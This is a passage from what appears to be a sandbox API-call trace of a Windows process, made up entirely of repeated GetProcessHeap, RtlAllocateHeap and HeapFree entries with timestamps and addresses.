0x6825848 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.516] GetProcessHeap () returned 0xe30000 [0134.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.517] GetProcessHeap () returned 0xe30000 [0134.517] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.517] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.518] GetProcessHeap () returned 0xe30000 [0134.518] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.518] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.519] GetProcessHeap () returned 0xe30000 [0134.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.519] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.520] GetProcessHeap () returned 0xe30000 [0134.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.521] GetProcessHeap () returned 0xe30000 [0134.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.521] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.522] GetProcessHeap () returned 0xe30000 [0134.522] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.523] GetProcessHeap () returned 0xe30000 [0134.523] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.530] GetProcessHeap () returned 0xe30000 [0134.530] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.531] GetProcessHeap () returned 0xe30000 [0134.531] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.628] GetProcessHeap () returned 0xe30000 [0134.628] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.628] GetProcessHeap () returned 0xe30000 [0134.628] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.628] GetProcessHeap () returned 0xe30000 [0134.628] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.628] GetProcessHeap () returned 0xe30000 [0134.665] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.713] GetProcessHeap () returned 0xe30000 [0134.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 